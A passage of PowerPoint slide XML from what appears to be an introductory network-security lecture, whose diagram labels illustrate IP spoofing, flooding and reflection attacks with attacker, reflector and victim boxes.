            <a:off x="2590800" y="3429000"/>
            <a:ext cx="1752600" cy="609600"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1104" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46099" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2112" y="1824"/>
              <a:ext cx="1104" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>dst: victim</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46100" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2112" y="1632"/>
              <a:ext cx="1104" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>src: random</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46094" name="Freeform 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="2895600"/>
            <a:ext cx="1874838" cy="1968500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1181"/>
              <a:gd name="T1" fmla="*/ 0 h 1240"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1181"/>
              <a:gd name="T10" fmla="*/ 0 h 1240"/>
              <a:gd name="T11" fmla="*/ 1181 w 1181"/>
              <a:gd name="T12" fmla="*/ 1240 h 1240"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1181" h="1240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="172" y="123"/>
                  <a:pt x="883" y="528"/>
                  <a:pt x="1032" y="735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1181" y="942"/>
                  <a:pt x="924" y="1135"/>
                  <a:pt x="895" y="1240"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46095" name="Freeform 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="2908300"/>
            <a:ext cx="1874838" cy="1968500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1181"/>
              <a:gd name="T1" fmla="*/ 0 h 1240"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1181"/>
              <a:gd name="T10" fmla="*/ 0 h 1240"/>
              <a:gd name="T11" fmla="*/ 1181 w 1181"/>
              <a:gd name="T12" fmla="*/ 1240 h 1240"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1181" h="1240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="172" y="123"/>
                  <a:pt x="883" y="528"/>
                  <a:pt x="1032" y="735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1181" y="942"/>
                  <a:pt x="924" y="1135"/>
                  <a:pt x="895" y="1240"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46096" name="Freeform 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="2895600"/>
            <a:ext cx="1874838" cy="1968500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1181"/>
              <a:gd name="T1" fmla="*/ 0 h 1240"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1181"/>
              <a:gd name="T10" fmla="*/ 0 h 1240"/>
              <a:gd name="T11" fmla="*/ 1181 w 1181"/>
              <a:gd name="T12" fmla="*/ 1240 h 1240"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1181" h="1240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="172" y="123"/>
                  <a:pt x="883" y="528"/>
                  <a:pt x="1032" y="735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1181" y="942"/>
                  <a:pt x="924" y="1135"/>
                  <a:pt x="895" y="1240"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46097" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4724400"/>
            <a:ext cx="2514600" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64144"/>
              <a:gd name="adj2" fmla="val 5130"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Oops, many packets are coming. But, who is the real source?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46098" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1447800"/>
            <a:ext cx="2514600" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>flooding attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1"/>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l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Spoofing Attacks:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47107" name="Picture 3" descr="pc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="5029200"/>
            <a:ext cx="796925" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Oval 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="2133600"/>
            <a:ext cx="1066800" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2514600"/>
            <a:ext cx="2057400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4572000" y="3352800"/>
            <a:ext cx="1143000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47111" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="2133600"/>
            <a:ext cx="1974850" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>ip spoofed packet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47112" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-3241179">
            <a:off x="4275932" y="3801268"/>
            <a:ext cx="1416050" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>reply packet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47113" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="5638800"/>
            <a:ext cx="768350" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47114" name="Picture 10" descr="pc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5519738" y="2316163"/>
            <a:ext cx="796925" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47115" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5391150" y="2909888"/>
            <a:ext cx="1009650" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>reflector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47116" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2590800"/>
            <a:ext cx="1752600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>src: victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47117" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2895600"/>
            <a:ext cx="1752600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>dst: reflector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="-3201861">
            <a:off x="4686300" y="3924300"/>
            <a:ext cx="1752600" cy="609600"/>
            <a:chOff x="3792" y="2352"/>
            <a:chExt cx="1104" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47121" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3792" y="2544"/>
              <a:ext cx="1104" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>dst: victim</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47122" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3792" y="2352"/>
              <a:ext cx="1104" cy="192"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>src: reflector</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47119" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4953000"/>
            <a:ext cx="2209800" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 101722"/>
              <a:gd name="adj2" fmla="val -17361"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Oops,  a lot of replies without any request…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25618" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1676400"/>
            <a:ext cx="1981200" cy="396875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reflection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
